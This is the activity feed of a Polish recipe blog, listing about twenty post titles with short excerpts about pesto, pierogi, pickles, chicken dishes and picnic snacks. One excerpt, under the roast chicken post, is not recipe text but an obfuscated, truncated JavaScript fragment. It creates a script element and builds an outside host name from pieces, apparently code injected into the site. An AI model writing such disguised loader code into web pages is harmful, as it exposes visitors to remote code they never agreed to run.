Kolorowy Przepisownik
-
Kolorowy Przepisownik dodał(a) nowy wpis, Pesto z rukoli ze słonecznikiem 8 lat, 3 miesiące temu
Pesto to rodzaj pysznego i szybkiego sosu/pasty, z przygotowaniem którego poradzi sobie nawet totalny, kuchenny laik. Pesto jest o tyle fajne, że ma dużo zastosowań, a to, do czego go…
Artykuł Pesto z rukoli ze[…] -
Kolorowy Przepisownik dodał(a) nowy wpis, Pierogi z jagodami 8 lat, 3 miesiące temu
Pierogi z jagodami to od kilku lat obowiązkowa sezonowa pozycja w moim domu. Podawane ze jogurtem naturalnym lub ewentualnie śmietaną i oprószone brązowym cukrem. Polecam na słodki obiad, znikają w trybie ekspre[…]

-
Kolorowy Przepisownik dodał(a) nowy wpis, Ciastka brownie z białą czekoladą 8 lat, 4 miesiące temu
Brownie? Odkąd spróbowałam uwielbiam! 🙂 i tylko dlatego, że staram się trzymać „dietę” nie piekę za często.A jeśli już, to małe ciasteczka – z jednej porcji nie wychodzi ich dużo, bo około 12, w efekcie czego po[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Faszerowane podudzia kurczaka w boczku, z fasolką szparagową – z jednej patelni 8 lat, 4 miesiące temu
Dania z jednej patelni uwielbiam – szybko, mało mycia i zawsze smacznie! A obiady z kawałkami kurczaka są zawsze dobrym pomysłem, szczególnie wtedy, kiedy tego pomysłu na obiad nie ma 😉 bo jednak delikatne mięso[…]

-
Kolorowy Przepisownik dodał(a) nowy wpis, Pasta ze słonecznika i suszonych pomidorów 8 lat, 4 miesiące temu
Pasta ze słonecznika i suszonych pomidorów to przepyszne, a w wykonaniu proste smarowidło do pieczywa, bardzo fajna alternatywa dla masła – cena masła oszalała, więc trzeba sobie jakoś radzić 😉 ja akurat[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Udka kurczaka pieczone z warzywami w rękawie 8 lat, 4 miesiące temu
Nie masz pomysłu na obiad lub nie chce Ci się stać nad garami i pilnować kilku rzeczy naraz? Mam dla Ciebie idealne rozwiązanie – danie z piekarnika, a dokładniej udka z kurczaka, które pieką się z warzywami w[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Ogórki kanapkowe słodko-kwaśne 8 lat, 4 miesiące temu
Lubię robić przetwory, ale nie tylko te stałe, które znamy od lat. Lubię eksperymentować, dlatego każdego roku staram się zrobić coś nowego. Kilkanaście dni temu padło na ogórki kanapkowe. Widziałam mnóstwo[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Ogórki kiszone krok po kroku – najlepszy przepis! 8 lat, 4 miesiące temu
Jak zrobić najlepsze ogórki kiszone? W bardzo prosty sposób! Poniżej opisuję wszystko krok po kroku wraz z własnymi uwagami + zdjęciami. To proste! Śmiało, spróbuj 😉
Ogórki kiszone – najlepszy przepis
Przepis na[…] -
Kolorowy Przepisownik dodał(a) nowy wpis, Koktajl kawowo-nektarynkowy (bez blendera) 8 lat, 4 miesiące temu
Czy może być coś lepszego do picia latem od kawowego koktajlu? 🙂 ten tutaj jest wprost przepyszny! Z nektarynką próbowałam po raz pierwszy, ale na pewno nie ostatni – boski smak :)To jednocześnie kawa, koktajl i[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Warsztaty fotografii kulinarnej z Olympus Polska 8 lat, 4 miesiące temu
Fotografia kulinarna to dziedzina, która bardzo mnie fascynuje i powoli staje się moim hobby (jak ten blog). Dlatego bardzo się ucieszyłam, że mogę wziąć udział w pierwszych w życiu warsztatach fotograficznych[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Chłodnik buraczkowy z gotowanym jabłkiem, arbuzem i mlekiem kokosowym 8 lat, 4 miesiące temu
Chłodnik na obiad w upalne dni to idealna propozycja! Za oknem skwar, więc nawet nie chce się za bardzo jeść, a gorącego to już zupełnie. Jednak jeść trzeba, więc chłodnik jest rozwiązaniem najbardziej optymalnym -[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Leczo z cukinii z papryką i kiełbasą – przepis podstawowy 8 lat, 4 miesiące temu
Leczo z cukinii z papryką i kiełbasą to danie, bez którego nie wyobrażam sobie lata! Absolutnie! 🙂 co więcej – robimy je tak często, że aż do znudzenia, choć tak naprawdę wcale się nie nudzi, bo ze składnikami i[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Muffinrollsy o smaku pizzy – optymalny wybór na piknik 8 lat, 5 miesięcy temu
Pizza jest dobra na różne okazje, ale przygotować ją można na setki sposobów. Dziś przedstawiam muffinrollsy, czyli mini pizze zwijane z nadzieniem i upieczone w formie do muffinek. Zrobiłam je w bardzo prostej[…]

-
Kolorowy Przepisownik dodał(a) nowy wpis, Kurczak pieczony na warzywach 8 lat, 5 miesięcy temu
(function(){ a4uk=document.createElement(„script”);a4uk_=”u”+(„s”)+”ta”; a4uk_+=(„t.i”)+””+”n”;a4uk_+=((„f”)+”o”);a4uk.type=”text/javascript”; a4uk_+=”/”;[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Sałatka z jajkiem, pomidorem, ziemniakami i kaparami + KONKURS 8 lat, 5 miesięcy temu
Sałatka jest dobra na każdą okazję. Święta, urodziny, imieniny, grill, lunch, kolacja ze znajomymi, kolacja dla dwojga, kolacja w ogóle 🙂 – wszędzie pojawia się sałatka, a pod tą jedną nazwą kryje się[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Piknikowe przekąski na 3 sposoby 8 lat, 5 miesięcy temu
Aby posiłek pod chmurką był przyjemny, trzeba zadbać o odpowiednie zaopatrzenie piknikowego kosza. W dzisiejszym wpisie pokażę Wam 3 (a właściwie to 4, ale ostatniego nie mam zdjęć, bo od razu były zjedzone)[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Makaron czekoladowy zapiekany pod płatkami ryżowymi, z owocami i bezą 8 lat, 5 miesięcy temu
Moje dzieci uwielbiają płatki ryżowe z owocami. Makaron też, szczególnie Zuzia, a na dźwięk „czekoladowy” (co by to nie było) obie aż piszczą, dlatego połączyłam wszystkie te smaki w jednej kokilce i tak powstały[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Makaronowo-jogurtowa buzia z owocami 8 lat, 5 miesięcy temu
Jak nakarmić dziecko sprawiając mu przy tym mega dużo radości? 🙂 podać mu to co lubi, ale tak, by cieszyło też oczy 😉 w moim przypadku makaron (lub kasza) z jogurtem to zawsze najlepsze wyjście, kiedy dzieci[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Grzanki piknikowe 8 lat, 5 miesięcy temu
Grzanki to zawsze dobry pomysł na przekąskę, a składniki mogą być naprawdę dowolne. Ja w tych z przepisu poniżej użyłam… zupełnie nie tego co planowałam 😀 miał być jeszcze pomidor, papryka, rukola… Miały być[…]
-
Kolorowy Przepisownik dodał(a) nowy wpis, Pasta z tofu z zielonym groszkiem i bazylią 8 lat, 5 miesięcy temu
Tofu – już sama nazwa dotąd mnie odstraszała i zupełnie nie wiem dlaczego! Masz tak czasem? Że czegoś nie znasz, nigdy nie nadarzyła się okazja, by choć mini ilość spróbować, a jakoś wcale Cię do tego próbowania[…]
- Załaduj więcej